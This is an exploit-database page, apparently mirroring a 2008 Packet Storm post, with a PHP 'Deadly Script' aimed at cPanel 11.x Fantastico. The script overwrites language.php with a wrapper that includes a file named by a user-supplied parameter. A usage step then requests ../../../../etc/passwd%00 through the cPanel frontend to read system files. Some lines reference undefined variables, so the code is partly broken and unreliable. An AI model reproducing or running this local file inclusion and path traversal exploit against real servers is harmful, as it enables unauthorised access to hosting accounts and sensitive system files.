Lucene search
K

cpanel-bypass.txt

🗓️ 02 Dec 2008 00:00:00Reported by Super-CrystalType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Cpanel 11.x language.php exploit for Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass" by Super-Crystal

Code
`Script : Cpanel 11.x  
bug : language.php [edite file]  
exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"  
  
safemode off , mod_security off Disable functions : All NONE ,access root folder   
  
<?php  
/*  
########################################   
# Deadly Script by Super-Crystal   
# bypass Cpanel fantastico   
# www.arab4services.net  
# ##e-mail : [email protected] , [email protected]##  
#######################################  
*/  
set_time_limit(0);  
if(isset($_POST['sup3r'])) {  
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {  
$phpwrapper = '<?php  
include_once("./language/".$_GET[sup3r].".php");   
?>  
';  
fwrite($h,$prctl);  
fclose($h);  
$handle = fopen($_POST['php'], "w");  
fwrite($handle, $phpwrapper);  
fclose($handle);  
echo "Building exploit...<br />";  
echo "coding by Super-Crystal <br />";  
echo "Cleaning up<br />";  
echo "Done!<br />  
</pre>";  
} else {  
echo "error : ".php_uname();  
}  
} else {  
?>  
<div align="center">  
<h3>Deadly Script</h3>  
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />  
<pre><div align="center">  
</pre></div><br />  
<table border="0" cellspacing="0">  
<tr>  
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">  
<table border="0" cellspacing="0">  
<tr>  
<td><div align="right">Exploit:</div></td>  
<td>  
<select name="exploit">  
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>  
</select>  
</td>  
</tr>  
<tr>  
<td><div align="right">change</div></td>  
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>  
</tr>  
<tr>  
</table>  
</div>  
<input type="hidden" name="sup3r" value="doit" />  
<input name="submit" type="submit" value="Submit" /><br />  
1- change /home/[user]/.fantasticodata/language.php  
<br />  
2- click on the submit  
<br />  
3- now put it like this (e.g)   
: http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .  
<br />  
<font color=red>Written: 10.10.2008</font><br />  
<font color=blue>Public: 26.11.2008</font><br />  
<div align="center">  
<font color=red>Author : Super-Crystal</font><br />  
<a href="http://www.arab4services.net">Arab4services.net </a></center>  
</div>  
</form>  
<?php } ?>   
  
  
arab4services.net  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation